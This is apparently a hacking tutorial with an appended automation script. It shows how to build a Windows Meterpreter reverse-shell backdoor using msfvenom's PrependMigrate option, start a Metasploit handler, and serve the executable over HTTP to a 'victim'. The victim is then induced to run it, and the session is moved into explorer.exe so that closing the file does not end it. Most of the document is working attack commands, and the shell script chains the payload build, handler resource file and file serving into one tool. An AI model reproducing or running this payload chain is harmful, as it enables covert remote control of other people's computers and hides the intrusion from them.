It is very important to migrate your backdoor into another Windows process; otherwise the victim can find it in Task Manager and end it, which also ends your session.
Migrating also protects the session itself: when the victim runs the backdoor executable the session starts, but as soon as that executable is closed the session closes with it, so without migration the attacker has to act very quickly the moment the session opens.
To get SYSTEM or administrator privileges the backdoor has to be run elevated, which is gated by Windows UAC. Migration does not change that: the process the payload moves into runs at the same privilege level as the stub that started it.
This assumes that you already have Metasploit installed, or that you are running Kali or BackTrack Linux. If it is not installed, you can download it from https://www.metasploit.com/
Step 1: Get your IP address with the ifconfig command. Use the address of the interface the victim can reach; it becomes the LHOST the payload calls back to.
Step 2: Generate the payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.132 LPORT=4466 PrependMigrate=true PrependMigrateProc=explorer.exe -f exe > /root/Desktop/HackFile.exe
The option name is PrependMigrateProc. msfvenom does not reject unknown option names, so a misspelling such as prependmigrateprocess is silently ignored and the stub falls back to its default target process.
PrependMigrate is a handy way of keeping a shell alive by moving it into a different process: the prepended stub starts a new copy of the process named in PrependMigrateProc (here explorer.exe), injects the payload into it and exits, so the session no longer depends on HackFile.exe staying open.
Step 3: Open Metasploit with the msfconsole command.
Step 4: The file has been generated on your Desktop (HackFile.exe). Now set up the handler that will receive the connection:
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.18.132
msf exploit(handler) > set lport 4466
msf exploit(handler) > options
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > run
Step 5: Share the file with HFS (HTTP File Server).
HFS (HTTP File Server) is installed by default in recent Kali Linux releases; if it is not installed, see our article:
How to send or receive files in Kali Linux - Using HFS (HTTP File Server)
Any web server works for this step; running python3 -m http.server from the directory holding HackFile.exe is the quickest alternative.
Step 6: On the victim PC (the Windows target), open the Kali Linux IP address in a browser.
Step 7: Download the file and run it.
Step 8: When the victim runs the file, the connection comes back to Kali and a Meterpreter session opens in the handler terminal.
A meterpreter session opened!
Check that the migration worked: in the session, getpid and ps should show Meterpreter running inside the explorer.exe the stub spawned, not inside HackFile.exe.
Step 9: Now check whether the backdoor comes back after the victim system reboots, so reboot it.
Windows is shutting down
All sessions close as the machine goes down.
Step 10: After the reboot, no new session arrives. The migrated Meterpreter lived only inside the explorer.exe process the stub created; nothing on the victim relaunches HackFile.exe at boot, so the connection is gone until the victim runs the file again.
Step 11: So PrependMigrate gives you a session that survives the victim closing or deleting HackFile.exe, not one that survives a restart. For a connection you can come back to after a reboot you need a separate persistence mechanism, which is outside the scope of this article.
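To tie Steps 1 through 5 together, here is an added shell script that is not part of the original article. It validates LHOST and LPORT before anything is generated, builds the PrependMigrate payload with msfvenom, writes an msfconsole resource file for the handler and checks that the output really is a Windows executable. The msfvenom options and Metasploit module names are real; the output directory, the file names HackFile.exe and handler.rc, and the use of python3 -m http.server in place of HFS are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example (not from the original article): one script for Steps 1-5.
# Real Metasploit names: windows/meterpreter/reverse_tcp, PrependMigrate,
# PrependMigrateProc, exploit/multi/handler, post/windows/manage/migrate.
# Assumed for illustration: the output directory, the HackFile.exe and
# handler.rc names, and python3 -m http.server in place of HFS.

# A wrong LHOST or LPORT yields a payload that never calls back, so check
# both before generating anything. The body runs in a subshell so the IFS
# change used for splitting does not leak into the caller.
valid_ipv4() (
    IFS=.
    set -- $1
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in
            ''|*[!0-9]*) return 1 ;;
        esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
)

valid_port() {
    case $1 in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Step 2: generate the payload. The option is PrependMigrateProc; msfvenom
# does not reject unknown option names, so a misspelling is silently ignored.
build_payload() {
    # $1 LHOST, $2 LPORT, $3 process to spawn and inject into, $4 output path
    msfvenom -p windows/meterpreter/reverse_tcp \
        "LHOST=$1" "LPORT=$2" PrependMigrate=true "PrependMigrateProc=$3" \
        -f exe -o "$4"
}

# Steps 3-4 as a resource file for msfconsole -r. ExitOnSession false keeps
# the listener up for further callbacks; AutoRunScript re-runs migration from
# the handler side in case the prepended stub did not manage it.
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
set AutoRunScript post/windows/manage/migrate
exploit -j -z
EOF
}

# Sanity check: a Windows executable starts with the "MZ" DOS header.
is_pe() {
    [ -f "$1" ] && [ "$(dd if="$1" bs=2 count=1 2>/dev/null)" = "MZ" ]
}

main() {
    lhost=$1 lport=$2 proc=${3:-explorer.exe} outdir=${4:-/root/Desktop}
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; exit 2; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; exit 2; }
    exe=$outdir/HackFile.exe rc=$outdir/handler.rc
    handler_rc "$lhost" "$lport" > "$rc"
    build_payload "$lhost" "$lport" "$proc" "$exe"
    is_pe "$exe" || { echo "msfvenom did not produce a PE file" >&2; exit 3; }
    echo "listener: msfconsole -q -r $rc"
    echo "serve   : cd $outdir && python3 -m http.server 80   # Step 5"
}

# Usage: sh backdoor_setup.sh LHOST LPORT [PROC] [OUTDIR]
if [ $# -ge 2 ]; then
    main "$@"
fi
```

Run it as sh backdoor_setup.sh 192.168.18.132 4466 on the Kali box, then start the listener and the web server with the two commands it prints. The resource file sets the payload before LHOST and LPORT and uses exploit -j -z so the handler runs as a background job and keeps accepting sessions.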